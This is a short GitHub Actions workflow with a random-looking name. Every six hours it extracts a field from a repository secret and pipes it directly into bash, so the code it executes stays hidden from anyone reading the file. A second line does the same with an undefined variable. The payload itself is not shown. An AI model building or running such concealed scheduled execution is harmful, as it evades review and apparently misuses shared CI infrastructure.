name: jiangjing19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '4 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jiangjing19871010
        env:
          wj4: ${{ secrets.wj4 }}
        run: |
          echo $wj4 | jq -r .t7 | /bin/bash
          echo $coww9 | jq -r .ky39 | /bin/bash

